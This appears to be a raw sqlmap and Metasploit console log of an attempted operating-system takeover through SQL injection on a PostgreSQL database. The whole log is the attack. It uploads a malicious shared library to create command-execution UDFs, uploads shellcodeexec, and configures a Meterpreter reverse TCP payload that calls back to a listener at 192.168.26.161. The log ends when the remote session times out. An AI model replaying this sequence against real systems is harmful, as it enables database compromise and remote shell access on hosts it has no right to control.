---
[08:43:48] [INFO] testing PostgreSQL
[08:43:48] [INFO] confirming PostgreSQL
[08:43:48] [INFO] the back-end DBMS is PostgreSQL
web application technology: Apache, PHP 5.4.36
back-end DBMS: PostgreSQL
[08:43:48] [INFO] testing if current user is DBA
[08:43:48] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[08:43:50] [INFO] checking if UDF 'sys_bineval' already exist
[08:43:50] [INFO] checking if UDF 'sys_exec' already exist
[08:43:51] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)                
[08:43:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[08:43:52] [INFO] the local file '/tmp/sqlmapQEjTbS94612/lib_postgresqludf_syscvT3XS.so' and the remote file '/tmp/libsmsvc.so' have the same size (6152 B)
[08:43:52] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[08:43:52] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 2
[08:43:55] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.26.161' (detected)] 
which local port number do you want to use? [36571] 
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 2
[08:44:04] [INFO] creation in progress ........ done
[08:44:12] [INFO] uploading shellcodeexec to '/tmp/tmpsezogf'
[08:44:13] [INFO] the local file '/tmp/sqlmapQEjTbS94612/shellcodeexec_WNwvg.x64' and the remote file '/tmp/tmpsezogf' have the same size (5160 B)
[08:44:13] [INFO] shellcodeexec successfully uploaded
[08:44:13] [INFO] running Metasploit Framework command line interface locally, please wait..
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

       =[ metasploit v4.15.2-dev                          ]
+ -- --=[ 1669 exploits - 968 auxiliary - 294 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => linux/x86/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 36571
LHOST => 192.168.26.161
[*] Started reverse TCP handler on 192.168.26.161:36571 
[*] Starting the payload handler...
[08:44:24] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[08:46:13] [CRITICAL] timeout occurred while attempting to open a remote session

[*] shutting down at 08:46:13
